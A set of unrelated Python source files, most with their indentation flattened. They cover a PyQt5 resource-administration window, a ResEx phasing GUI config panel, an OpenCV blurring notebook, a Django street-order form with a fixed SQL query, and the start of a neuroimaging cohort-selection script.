# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'adminstration.ui'
#
# Created by: PyQt5 UI code generator 5.15.2
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
from views.dialog import CustomDialog
from DB import infoTable
class Ui_AdminstrationWindow(object):
def __init__(self,*args):
print(args)
self.idVal = None
self.locVal = None
self.startVal = None
self.endVal = None
self.residentId = None
self.priorityVal = None
self.isInfoPresent = False
self.rawMaterialVal = None
self.machinesVal = None
self.statisticsVal = None
if len(args) == 1 and len(args[0]) == 10:
args = args[0]
self.idVal = args[0]
self.locVal = args[1]
self.startVal = args[2]
self.endVal = args[3]
self.residentId = args[4]
if args[5] is not None:
self.isInfoPresent = True
self.priorityVal = str(args[6])
self.rawMaterialVal = args[7]
self.machinesVal = args[8]
self.statisticsVal = args[9]
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(600, 600)
MainWindow.setFixedSize(600,600)
font = QtGui.QFont()
font.setPointSize(9)
MainWindow.setFont(font)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(220, 0, 171, 51))
font = QtGui.QFont()
font.setPointSize(16)
font.setUnderline(True)
self.label.setFont(font)
self.label.setObjectName("label")
self.line = QtWidgets.QFrame(self.centralwidget)
self.line.setGeometry(QtCore.QRect(10, 290, 581, 20))
self.line.setFrameShape(QtWidgets.QFrame.HLine)
self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line.setObjectName("line")
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setGeometry(QtCore.QRect(20, 60, 151, 31))
font = QtGui.QFont()
font.setPointSize(11)
self.label_2.setFont(font)
self.label_2.setObjectName("label_2")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setGeometry(QtCore.QRect(10, 130, 171, 21))
font = QtGui.QFont()
font.setPointSize(10)
self.label_3.setFont(font)
self.label_3.setObjectName("label_3")
self.rawMaterialInput = QtWidgets.QPlainTextEdit(self.centralwidget)
self.rawMaterialInput.setGeometry(QtCore.QRect(200, 120, 341, 161))
font = QtGui.QFont()
font.setPointSize(10)
self.rawMaterialInput.setFont(font)
self.rawMaterialInput.setObjectName("rawMaterialInput")
self.line_2 = QtWidgets.QFrame(self.centralwidget)
self.line_2.setGeometry(QtCore.QRect(10, 90, 221, 20))
self.line_2.setFrameShape(QtWidgets.QFrame.HLine)
self.line_2.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_2.setObjectName("line_2")
self.label_4 = QtWidgets.QLabel(self.centralwidget)
self.label_4.setGeometry(QtCore.QRect(20, 330, 161, 21))
font = QtGui.QFont()
font.setPointSize(10)
self.label_4.setFont(font)
self.label_4.setObjectName("label_4")
self.machineInput = QtWidgets.QPlainTextEdit(self.centralwidget)
self.machineInput.setGeometry(QtCore.QRect(200, 320, 341, 161))
font = QtGui.QFont()
font.setPointSize(10)
self.machineInput.setFont(font)
self.machineInput.setObjectName("machineInput")
self.updateBtn = QtWidgets.QPushButton(self.centralwidget)
self.updateBtn.setGeometry(QtCore.QRect(410, 490, 121, 41))
font = QtGui.QFont()
font.setPointSize(10)
self.updateBtn.setFont(font)
self.updateBtn.setMouseTracking(True)
self.updateBtn.setObjectName("updateBtn")
self.updateBtn.clicked.connect(lambda :self.addResources(MainWindow))
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 599, 26))
self.menubar.setObjectName("menubar")
self.menuMenu = QtWidgets.QMenu(self.menubar)
self.menuMenu.setObjectName("menuMenu")
self.menuAbout = QtWidgets.QMenu(self.menubar)
self.menuAbout.setObjectName("menuAbout")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.actiondevelopers = QtWidgets.QAction(MainWindow)
self.actiondevelopers.setObjectName("actiondevelopers")
self.menuAbout.addAction(self.actiondevelopers)
self.menubar.addAction(self.menuMenu.menuAction())
self.menubar.addAction(self.menuAbout.menuAction())
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "update resources"))
        self.label.setText(_translate("MainWindow", "Administration"))
self.label_2.setText(_translate("MainWindow", "Update Resources :"))
self.label_3.setText(_translate("MainWindow", " Available rawMaterial:"))
self.label_4.setText(_translate("MainWindow", "Available Machines:"))
self.updateBtn.setText(_translate("MainWindow", "Update"))
self.menuMenu.setTitle(_translate("MainWindow", "Menu"))
self.menuAbout.setTitle(_translate("MainWindow", "About"))
self.actiondevelopers.setText(_translate("MainWindow", "developers"))
# SET VALUES FROM DB
        # Guard against None values when no info row exists for this complaint yet.
        if self.rawMaterialVal is not None:
            self.rawMaterialInput.setPlainText(_translate("MainWindow", self.rawMaterialVal))
        if self.machinesVal is not None:
            self.machineInput.setPlainText(_translate("MainWindow", self.machinesVal))
if self.isInfoPresent:
val = infoTable.getComplaintInfo(str(self.idVal))
print(val)
def addResources(self,win):
rawMaterial = self.rawMaterialInput.toPlainText()
machine = self.machineInput.toPlainText()
mapping = {
'complainId' : self.idVal,
'rawMaterial' : rawMaterial,
'machines' : machine
}
print(mapping)
try:
if self.isInfoPresent:
infoTable.updateMaterialInfo(mapping)
else:
infoTable.makeMaterialInfo(mapping)
msg = CustomDialog.init_message('Success', 'Database Updated')
if msg.exec_():
win.close()
except Exception as e:
print(e)
msg = CustomDialog.init_message('Warning', str(e), 'warning')
msg.exec_()
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_AdminstrationWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
from __future__ import print_function
import sys
import os
import time
import subprocess
import multiprocessing
import numpy as np
import matplotlib
import matplotlib.patches as patches
try:
from PyQt5 import QtCore, QtWidgets, QtGui # pylint: disable=import-error
matplotlib.use('qt5agg')
from matplotlib.backends.backend_qt5agg import FigureCanvas # pylint: disable=no-name-in-module
os.environ['QT_API'] = 'pyqt5'
except ImportError:
import sip
sip.setapi('QString', 2)
from PyQt4 import QtCore, QtGui # pylint: disable=import-error
from PyQt4 import QtGui as QtWidgets # pylint: disable=import-error
matplotlib.use('qt4agg')
from matplotlib.backends.backend_qt4agg import FigureCanvas # pylint: disable=no-name-in-module
os.environ['QT_API'] = 'pyqt'
from . import worker
class IniHighlighter(QtGui.QSyntaxHighlighter):
def __init__(self, parent):
super(IniHighlighter, self).__init__(parent)
self.char_formats = [
self.make_charformat('red'),
self.make_charformat('darkGreen', bold=True),
self.make_charformat('darkBlue'),
self.make_charformat('gray'),
]
patterns = [r'\[.*\]', r'^(.*)=', r'=([^\n]*)', r'#[^\n]*']
self.rules = [QtCore.QRegExp(p) for p in patterns]
def make_charformat(self, color, bold=False, italics=False):
cf = QtGui.QTextCharFormat()
cf.setForeground(QtGui.QBrush(QtGui.QColor(color)))
if bold:
cf.setFontWeight(QtGui.QFont.Bold)
cf.setFontItalic(italics)
return cf
def highlightBlock(self, text):
for rule, cf in zip(self.rules, self.char_formats):
index = rule.indexIn(text, 0)
while index >= 0:
length = len(rule.cap(0))
self.setFormat(index, length, cf)
index = rule.indexIn(text, index+length)
self.setCurrentBlockState(0)
class ConfigPanel(QtWidgets.QWidget):
def __init__(self, parent, **kwargs):
super(ConfigPanel, self).__init__(parent, **kwargs)
self.parent = parent
self.canvas_panel = parent.canvas_panel
self.input_merge_fname = parent.input_merge_fname
self.input_map_fname = parent.input_map_fname
self.setObjectName('config')
self.setAttribute(QtCore.Qt.WA_StyledBackground)
self.processed_map = False
self.checker = QtCore.QTimer(self)
self.checker.timeout.connect(self.keep_checking)
self.launcher = worker.Launcher(self, self.parent.launch_cmd)
self.init_UI()
def init_UI(self):
self.setMinimumWidth(300)
#self.setMinimumWidth(80)
vbox = QtWidgets.QVBoxLayout()
self.setLayout(vbox)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
self.title_label = QtWidgets.QLabel('ResEx Phasing GUI', self)
self.title_label.setObjectName('heading')
hbox.addWidget(self.title_label)
hbox.addStretch(1)
'''
self.collapse_button = QtWidgets.QPushButton('<', self)
self.collapse_button.clicked.connect(self.toggle_config)
hbox.addWidget(self.collapse_button)
'''
# Tabs
self.notebook = QtWidgets.QTabWidget()
vbox.addWidget(self.notebook, stretch=2)
# Bottom panel
self.plot_controls = self.canvas_panel.init_plot_controls(self.input_merge_fname)
vbox.addWidget(self.plot_controls)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
hbox.addStretch(1)
'''
button = QtWidgets.QPushButton("Preprocess", self)
button.clicked.connect(self.preprocess)
hbox.addWidget(button)
'''
button = QtWidgets.QPushButton("Quit", self)
button.clicked.connect(self.parent.close)
hbox.addWidget(button)
self.gen_merge_tab()
self.gen_map_tab()
self.gen_recon_tab()
self.show()
self.plot_vol(fname=self.input_merge_fname)
def gen_merge_tab(self, add=True):
self.merge_tab = QtWidgets.QWidget()
if add:
self.notebook.addTab(self.merge_tab, 'Merge')
vbox = QtWidgets.QVBoxLayout(self.merge_tab)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
label = QtWidgets.QLabel('Merge File', self)
hbox.addWidget(label)
self.merge_fname = QtWidgets.QLineEdit(self.input_merge_fname, self)
hbox.addWidget(self.merge_fname, stretch=1)
button = QtWidgets.QPushButton('Plot Merge', self)
button.clicked.connect(lambda :self.plot_vol(fname=self.merge_fname.text(), zoom=False))
hbox.addWidget(button)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
label = QtWidgets.QLabel('Cutoff radii:', self)
hbox.addWidget(label)
self.radiusmin = QtWidgets.QLineEdit('0', self)
self.radiusmin.setFixedWidth(80)
hbox.addWidget(self.radiusmin)
self.radiusmax = QtWidgets.QLineEdit('200', self)
self.radiusmax.setFixedWidth(80)
hbox.addWidget(self.radiusmax)
self.circleflag = QtWidgets.QCheckBox('Show', self)
#self.circleflag.stateChanged.connect(lambda: self.canvas_panel.replot(zoom=False))
self.circleflag.stateChanged.connect(self.update_rings)
hbox.addWidget(self.circleflag)
hbox.addStretch(1)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
label = QtWidgets.QLabel('Scale radii:', self)
hbox.addWidget(label)
self.scaleradmin = QtWidgets.QLineEdit('60', self)
self.scaleradmin.setFixedWidth(80)
hbox.addWidget(self.scaleradmin)
self.scaleradmax = QtWidgets.QLineEdit('80', self)
self.scaleradmax.setFixedWidth(80)
hbox.addWidget(self.scaleradmax)
self.scaleradflag = QtWidgets.QCheckBox('Show', self)
#self.scaleradflag.stateChanged.connect(lambda: self.canvas_panel.replot(zoom=False))
self.scaleradflag.stateChanged.connect(self.update_rings)
hbox.addWidget(self.scaleradflag)
hbox.addStretch(1)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
button = QtWidgets.QPushButton('Zero Outer', self)
button.clicked.connect(self.launcher.zero_outer)
hbox.addWidget(button)
button = QtWidgets.QPushButton('Calc. Scale', self)
button.clicked.connect(self.launcher.calc_scale)
hbox.addWidget(button)
button = QtWidgets.QPushButton('Reset', self)
button.clicked.connect(self.reset_merge_tab)
hbox.addWidget(button)
self.zero_outer_line = QtWidgets.QFrame()
vbox.addWidget(self.zero_outer_line)
hbox = QtWidgets.QHBoxLayout()
self.zero_outer_line.setLayout(hbox)
hbox.setContentsMargins(0, 0, 0, 0)
zero_fname = os.path.splitext(self.merge_fname.text())[0] + '-zero.raw'
label = QtWidgets.QLabel('Zero-ed volume:', self)
hbox.addWidget(label)
button = QtWidgets.QPushButton(zero_fname, self)
button.clicked.connect(lambda: self.plot_vol(fname=zero_fname))
hbox.addWidget(button)
hbox.addStretch(1)
self.zero_outer_line.hide()
self.calc_scale_line = QtWidgets.QFrame()
vbox.addWidget(self.calc_scale_line)
hbox = QtWidgets.QHBoxLayout()
self.calc_scale_line.setLayout(hbox)
hbox.setContentsMargins(0, 0, 0, 0)
self.scale_label = QtWidgets.QLabel('Scale factor = %.6e'%0.0, self)
hbox.addWidget(self.scale_label)
hbox.addStretch(1)
self.calc_scale_line.hide()
vbox.addStretch(1)
def gen_map_tab(self, add=True):
self.map_tab = QtWidgets.QWidget()
if add:
self.notebook.addTab(self.map_tab, 'Map')
vbox = QtWidgets.QVBoxLayout(self.map_tab)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
label = QtWidgets.QLabel('Map File', self)
hbox.addWidget(label)
self.map_fname = QtWidgets.QLineEdit(self.input_map_fname, self)
hbox.addWidget(self.map_fname, stretch=1)
button = QtWidgets.QPushButton('Plot Map', self)
button.clicked.connect(lambda: self.canvas_panel.plot_map(self.map_fname.text()))
hbox.addWidget(button)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
label = QtWidgets.QLabel('Res. at edge (A):', self)
hbox.addWidget(label)
self.resedge = QtWidgets.QLineEdit('2.0', self)
#self.resedge.setFixedWidth(60)
hbox.addWidget(self.resedge)
label = QtWidgets.QLabel('Point group:', self)
hbox.addWidget(label)
self.point_group = QtWidgets.QLineEdit('222', self)
#self.point_group.setFixedWidth(60)
hbox.addWidget(self.point_group)
hbox.addStretch(1)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
button = QtWidgets.QPushButton('Process Map', self)
button.clicked.connect(self.process_map)
hbox.addWidget(button)
self.reset_button = QtWidgets.QPushButton('Reset', self)
self.reset_button.clicked.connect(self.reset_map_tab)
self.reset_button.setEnabled(False)
hbox.addWidget(self.reset_button)
hbox.addStretch(1)
vbox.addStretch(1)
def gen_recon_tab(self):
self.recon_tab = QtWidgets.QWidget()
self.notebook.addTab(self.recon_tab, 'Recon')
vbox = QtWidgets.QVBoxLayout(self.recon_tab)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
label = QtWidgets.QLabel('Output Prefix:', self)
hbox.addWidget(label)
self.output_prefix = QtWidgets.QLineEdit('data/recon/output', self)
hbox.addWidget(self.output_prefix, stretch=1)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
label = QtWidgets.QLabel('Config file name:', self)
hbox.addWidget(label)
self.config_fname = QtWidgets.QLineEdit('config.ini', self)
hbox.addWidget(self.config_fname, stretch=1)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
self.bgfitting_flag = QtWidgets.QCheckBox('BG Fitting', self)
hbox.addWidget(self.bgfitting_flag)
self.variation_flag = QtWidgets.QCheckBox('Variation support', self)
hbox.addWidget(self.variation_flag)
self.positivity_flag = QtWidgets.QCheckBox('Positivity', self)
hbox.addWidget(self.positivity_flag)
hbox.addStretch(1)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
button = QtWidgets.QPushButton('Generate', self)
button.clicked.connect(self.gen_config)
hbox.addWidget(button)
button = QtWidgets.QPushButton('Show', self)
button.clicked.connect(self.show_config)
hbox.addWidget(button)
button = QtWidgets.QPushButton('Save', self)
button.clicked.connect(self.save_config)
hbox.addWidget(button)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
button = QtWidgets.QPushButton('Launch Recon', self)
button.clicked.connect(self.launch_recon)
hbox.addWidget(button, stretch=1)
self.checkflag = QtWidgets.QCheckBox('Keep Checking', self)
self.checkflag.stateChanged.connect(self.keep_checking)
hbox.addWidget(self.checkflag)
self.fslices = QtWidgets.QCheckBox('Fourier', self)
hbox.addWidget(self.fslices)
hbox.addStretch(1)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox, stretch=1)
self.config_area = QtWidgets.QPlainTextEdit(self)
self.highlighter = IniHighlighter(self.config_area.document())
self.config_area.setPlainText('')
hbox.addWidget(self.config_area)
def reset_merge_tab(self, event=None):
self.notebook.removeTab(0)
#self.merge_tab.delete()
self.gen_merge_tab(add=False)
self.notebook.insertTab(0, self.merge_tab, 'Merge')
self.notebook.setCurrentIndex(0)
self.parse_vol(reset=True)
def reset_map_tab(self, event=None):
self.processed_map = True
self.notebook.removeTab(1)
#self.map_tab.delete()
self.map_tab = None
self.gen_map_tab(add=False)
self.notebook.insertTab(1, self.map_tab, 'Map')
self.notebook.setCurrentIndex(1)
self.processed_map = False
        self.reset_button.setEnabled(False)
def add_to_map_tab(self, mapnoext):
if self.processed_map:
return
prefix = 'data/convert/'+mapnoext
vbox = self.map_tab.layout()
vbox.removeItem(vbox.takeAt(vbox.count()-1))
hbox = vbox.takeAt(vbox.count()-1).layout()
hbox.removeItem(hbox.takeAt(hbox.count()-1))
self.suppressflag = QtWidgets.QCheckBox('Suppress low-q', self)
self.suppressflag.stateChanged.connect(lambda: self.canvas_panel.replot(zoom='current', sigma=self.suppressflag.isChecked()))
hbox.addWidget(self.suppressflag)
hbox.addStretch(1)
vbox.addLayout(hbox)
grid = QtWidgets.QGridLayout()
vbox.addLayout(grid)
label = QtWidgets.QLabel('Complex:', self)
grid.addWidget(label, 0, 0)
button = QtWidgets.QPushButton(os.path.basename(prefix + '.cpx'), self)
button.clicked.connect(lambda: self.plot_vol(fname=prefix + '.cpx', sigma=self.suppressflag.isChecked()))
grid.addWidget(button, 0, 1)
label = QtWidgets.QLabel('Symmetrized:', self)
grid.addWidget(label, 1, 0)
button = QtWidgets.QPushButton(os.path.basename(prefix + '-sym.raw'), self)
button.clicked.connect(lambda: self.plot_vol(fname=prefix + '-sym.raw', sigma=self.suppressflag.isChecked()))
grid.addWidget(button, 1, 1)
label = QtWidgets.QLabel('Density:', self)
grid.addWidget(label, 2, 0)
button = QtWidgets.QPushButton(os.path.basename(prefix + '-srecon.raw'), self)
button.clicked.connect(lambda: self.plot_vol(fname=prefix + '-srecon.raw', zoom=True))
grid.addWidget(button, 2, 1)
label = QtWidgets.QLabel('Support:', self)
grid.addWidget(label, 3, 0)
button = QtWidgets.QPushButton(os.path.basename(prefix + '.supp'), self)
button.clicked.connect(lambda: self.plot_vol(fname=prefix + '.supp', zoom=True, interpolation=None))
grid.addWidget(button, 3, 1)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
label = QtWidgets.QLabel('Support: Conv. radius = ', self)
hbox.addWidget(label)
self.suppradstr = QtWidgets.QLineEdit('3', self)
self.suppradstr.setFixedWidth(40)
hbox.addWidget(self.suppradstr)
label = QtWidgets.QLabel('vox. Threshold = ', self)
hbox.addWidget(label)
self.suppthreshstr = QtWidgets.QLineEdit('1', self)
self.suppthreshstr.setFixedWidth(40)
hbox.addWidget(self.suppthreshstr)
hbox.addStretch(1)
hbox = QtWidgets.QHBoxLayout()
vbox.addLayout(hbox)
button = QtWidgets.QPushButton('Update support', self)
button.clicked.connect(lambda: self.process_map(skip=True))
hbox.addWidget(button)
hbox.addStretch(1)
vbox.addStretch(1)
self.reset_button.setEnabled(True)
self.processed_map = True
def gen_config(self, event=None):
if self.calc_scale_line.isHidden() or self.zero_outer_line.isHidden():
print('Need to zero_outer and calc_scale first')
return
with open(self.config_fname.text(), 'w') as f:
f.write('[parameters]\n')
f.write('size = %d\n' % self.canvas_panel.vol_size)
f.write('bragg_qmax = %f\n' % (float(self.radiusmin.text())/(self.canvas_panel.vol_size//2)))
f.write('scale_factor = %f\n' % float(self.scale_label.text().split()[-1]))
f.write('num_threads = %d\n' % multiprocessing.cpu_count())
f.write('point_group = %s\n' % self.point_group.text())
mapnoext = os.path.splitext(os.path.basename(self.map_fname.text()))[0]
f.write('\n[files]\n')
f.write('intens_fname = %s\n' % (os.path.splitext(self.merge_fname.text())[0].rstrip()+'-zero.raw'))
f.write('bragg_fname = %s\n' % ('data/convert/'+mapnoext+'.cpx'))
f.write('support_fname = %s\n' % ('data/convert/'+mapnoext+'.supp'))
#f.write('input_fname = %s\n')
f.write('output_prefix = %s\n' % self.output_prefix.text())
f.write('\n[algorithm]\n')
#f.write('# Algorithm choices: DM, HIO, RAAR, mod-DM, ER\n')
#f.write('# With beta = 1, all algorithms except ER are equivalent\n')
#f.write('# algorithm and avg_algorithm are space separated with alternating numbers and names\n')
f.write('algorithm = 200 DM\n')
f.write('avg_algorithm = 100 DM\n')
f.write('beta = 1.\n')
            if self.positivity_flag.isChecked():
f.write('positivity = 1\n')
            if self.bgfitting_flag.isChecked():
f.write('bg_fitting = 1\n')
            if self.variation_flag.isChecked():
f.write('local_variation = 1\n')
'''
if self.histogram_flag.text() == 1:
f.write('histogram = 1\n')
f.write('hist_fname = data/3wu2_hist.dat\n')
'''
print('Generated %s' % self.config_fname.text())
self.show_config()
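    # Example of a generated config (added illustration; the numbers and file names are
    # hypothetical and depend on the loaded volume and the chosen radii):
    #
    #   [parameters]
    #   size = 501
    #   bragg_qmax = 0.360000
    #   scale_factor = 0.001200
    #   num_threads = 8
    #   point_group = 222
    #
    #   [files]
    #   intens_fname = data/merge-zero.raw
    #   bragg_fname = data/convert/model.cpx
    #   support_fname = data/convert/model.supp
    #   output_prefix = data/recon/output
    #
    #   [algorithm]
    #   algorithm = 200 DM
    #   avg_algorithm = 100 DM
    #   beta = 1.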
def show_config(self):
with open(self.config_fname.text(), 'r') as f:
config_text = f.read()
self.config_area.setPlainText(config_text)
self.config_area.show()
self.highlighter.rehighlight()
def save_config(self):
with open(self.config_fname.text(), 'w') as f:
f.write(self.config_area.toPlainText())
def plot_vol(self, **kwargs):
'''Wrapper around canvas_panel.plot_vol'''
parsed = self.canvas_panel.plot_vol(**kwargs)
if parsed:
size = self.canvas_panel.vol_size
self.radiusmin.setText('%d' % (size//2//2))
self.radiusmax.setText('%d' % (size))
self.scaleradmin.setText('%d' % (size//2//2*0.9))
self.scaleradmax.setText('%d' % (size//2//2*1.1))
def process_map(self, event=None, skip=False):
'''Wrapper around launcher.process_map'''
mapnoext = os.path.splitext(os.path.basename(self.map_fname.text()))[0]
if skip or (not os.path.isfile('data/convert/'+mapnoext+'.cpx')) or QtWidgets.QMessageBox.question(self, 'Process Map', 'Found processed map output. Overwrite?', QtWidgets.QMessageBox.Yes, QtWidgets.QMessageBox.No) == QtWidgets.QMessageBox.Yes:
            if self.resedge.text() == '':
print('Need resolution at edge of volume')
return
self.launcher.process_map(skip=skip)
else:
self.add_to_map_tab(mapnoext)
with open('results/'+mapnoext+'.log', 'r') as f:
words = f.read().split()
warray = np.array(words)
self.resedge.setText(str(float(words[words.index('./utils/read_map')+2])/(self.canvas_panel.vol_size//2)))
self.point_group.setText(words[np.where(warray=='data/convert/'+mapnoext+'-srecon.raw')[0][0]+2])
self.suppradstr.setText('%.1f'%float(words[np.where(warray=='./utils/create_support')[0][-1]+2]))
self.suppthreshstr.setText('%.1f'%float(words[np.where(warray=='./utils/create_support')[0][-1]+3]))
def launch_recon(self, event=None):
'''Wrapper around launcher.launch_recon'''
if (not os.path.isfile(self.output_prefix.text()+'-log.dat')) or QtWidgets.QMessageBox.question(self, 'Overwrite Output?', 'Found output with same prefix: %s\nOverwrite?'%self.output_prefix.text(), QtWidgets.QMessageBox.Yes, QtWidgets.QMessageBox.No) == QtWidgets.QMessageBox.Yes:
self.launcher.launch_recon()
def keep_checking(self, event=None):
if self.checkflag.isChecked():
self.canvas_panel.update_slices(self.output_prefix.text(), fslices=self.fslices.isChecked())
self.checker.start(1000)
else:
self.checker.stop()
def update_rings(self, event=None):
s = self.canvas_panel.figure.axes[0]
size = self.canvas_panel.vol_size
[a.remove() for a in list(set(s.findobj(patches.Circle)))]
if self.circleflag.isChecked():
rmin = float(self.radiusmin.text())
rmax = float(self.radiusmax.text())
s.add_artist(patches.Circle((size//2,size//2), rmin, ec='white', fc='none'))
s.add_artist(patches.Circle((size//2,size//2), rmax, ec='white', fc='none'))
if self.scaleradflag.isChecked():
rmin = float(self.scaleradmin.text())
rmax = float(self.scaleradmax.text())
s.add_artist(patches.Circle((size//2,size//2), rmin, ec='white', fc='none', ls='dashed'))
s.add_artist(patches.Circle((size//2,size//2), rmax, ec='white', fc='none', ls='dashed'))
self.canvas_panel.canvas.draw()
|
# coding: utf-8
# In[7]:
import cv2
import numpy as np
import imutils
import matplotlib.pyplot as plt
# In[8]:
img = cv2.imread('/home/padmach/data/pyimagesearch/flower1.jpg')
cv2.imshow('',img)
cv2.waitKey(0)
# In[15]:
kernelSizes =[(3,3),(3,5),(9,9), (15, 15), (5, 3), (9,19), (19,19)]
#Applying average blurring
for (kx, ky) in kernelSizes:
blurred = cv2.blur(img, (kx,ky))
cv2.imshow('Average ({}, {})'.format(kx, ky), blurred)
cv2.waitKey(0)
# In[14]:
#Applying Gaussian blurring
for (kx, ky) in kernelSizes:
blurred = cv2.GaussianBlur(img, (kx,ky),0) #0 indicates that standard deviation is computed based on kernel size
cv2.imshow('Gaussian ({},{})'.format(kx,ky), blurred)
cv2.waitKey(0)
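# Added note (not in the original notebook): when sigma=0, OpenCV derives the standard
# deviation from the kernel size as sigma = 0.3*((ksize-1)*0.5 - 1) + 0.8
# (see the cv2.getGaussianKernel documentation).
for k in (3, 9, 15):
    print('ksize={}, implied sigma={:.2f}'.format(k, 0.3 * ((k - 1) * 0.5 - 1) + 0.8))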
# In[18]:
#Applying Median filtering
for k in (3, 9, 15, 19, 21, 23, 25, 27, 29):
blurred = cv2.medianBlur(img, k)
cv2.imshow('Median {}'.format(k), blurred)
cv2.waitKey(0)
# In[21]:
#Applying Bilateral filtering
params =[(11, 21, 7), (11, 41, 21),(11, 61, 39)]
for (diameter, sigmaColor, sigmaSpace) in params:
blurred = cv2.bilateralFilter(img, diameter, sigmaColor, sigmaSpace)
cv2.imshow('Blurred d ={}, sc = {}, ss = {}'.format(diameter, sigmaColor, sigmaSpace), blurred)
cv2.waitKey(0)
# In[ ]:
|
# coding=utf-8
from django.forms import ModelForm, CharField, HiddenInput, ModelChoiceField
from models import Order, Street
def qqq(**x):
    return Street.objects.get(pk=x['pk'])
def my_special_sql_for_vasilyevsky_island_streets ():
return u"""
(SELECT * FROM mulan_street WHERE (name<'линия' AND (type!='линия' OR (type='линия' AND (LENGTH(name)>4)))) ORDER BY name)
UNION ALL
(SELECT * FROM mulan_street WHERE type='линия' AND LENGTH(name)=3 ORDER BY name)
UNION ALL
(SELECT * FROM mulan_street WHERE type='линия' AND LENGTH(name)=4 ORDER BY name)
UNION ALL
(SELECT * FROM mulan_street WHERE (name>'линия' AND (type!='линия' OR (type='линия' AND (LENGTH(name)>4)))) ORDER BY name)
"""
class OrderForm(ModelForm):
order_contents = CharField(label="", widget=HiddenInput(), required=False)
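    # RawQuerySet does not provide the all()/get() methods that ModelChoiceField expects
    # from its queryset, so both are patched onto the raw result below to preserve the
    # custom street ordering produced by the SQL above.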
q0 = (Street.objects.raw(my_special_sql_for_vasilyevsky_island_streets()))
q0.all = q0.__iter__
    q0.get = lambda **x: qqq(**x)
    street = ModelChoiceField(queryset=q0, label="Улица")
class Meta:
model = Order
exclude = ('processed',)
|
# -*- coding: utf-8 -*-
import os
import os.path as op
import json
import random
# ----------------------------------------------------------------------- #
# Functions to create cohorts with some subjects which have not all files
# ----------------------------------------------------------------------- #
def select_subjects(env_file, name_cohort, save):
""" Create the exclusion list of a cohort, regardless if the subject have the good files or not
"""
dico = {}
dico['exclusion_list'] = []
dico['inclusion_list'] = []
sbj = 0
with open(env_file, 'r') as f:
param = json.load(f)
db_dir = param["cohorts"][name_cohort]['path']
acquisition = param["cohorts"][name_cohort]['acquisition']
center = param["cohorts"][name_cohort]['centers']
analysis = param["cohorts"][name_cohort]['analysis']
graph_v = param["cohorts"][name_cohort]['graph_v']
ngraph_v = param["cohorts"][name_cohort]['ngraph_v']
session = param["cohorts"][name_cohort]['session']
path = os.path.join(db_dir, center)
    print('Subjects excluded: ')
for s in os.listdir(path):
if s[-4:] != "minf" and s[-4:] != "html":
sbj += 1
hemi = 'L'
# T1
if not (op.exists(op.join(db_dir, center, s, 't1mri', acquisition, s + ".nii"))
or op.exists(op.join(db_dir, center, s, 't1mri', acquisition, s + ".nii.gz"))):
dico['exclusion_list'].append(s)
print(s, ': No T1')
# Roots
elif not (op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation',
hemi + 'roots_' + s + '.nii'))
or op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation',
hemi + 'roots_' + s + '.nii.gz'))):
dico['exclusion_list'].append(s)
print(s, ': No roots')
# Skeleton
elif not (op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'skeleton_' + s + '.nii'))
or op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'segmentation', hemi + 'skeleton_' + s + '.nii.gz'))):
dico['exclusion_list'].append(s)
print(s, ': No skeleton')
# Graph
elif not op.exists(op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'folds', graph_v, session, hemi + s + '_' + session + '.arg')):
dico['exclusion_list'].append(s)
print(s, ': No graph')
# Not cut graph
elif not op.exists(
op.join(db_dir, center, s, 't1mri', acquisition, analysis, 'folds', ngraph_v, hemi + s + '.arg')):
if ngraph_v != -1:
dico['exclusion_list'].append(s)
print('No not cut graph')
else:
dico['inclusion_list'].append(s)
    print('Total number of subjects: ', sbj)
    print('Number of excluded subjects: ', len(dico['exclusion_list']))
    print('Number of included subjects: ', len(dico['inclusion_list']))
if save:
with open(env_file, 'r') as f:
env = json.load(f)
env["cohorts"][name_cohort]["exclusion"] = dico['exclusion_list']
with open(env_file, 'w') as f:
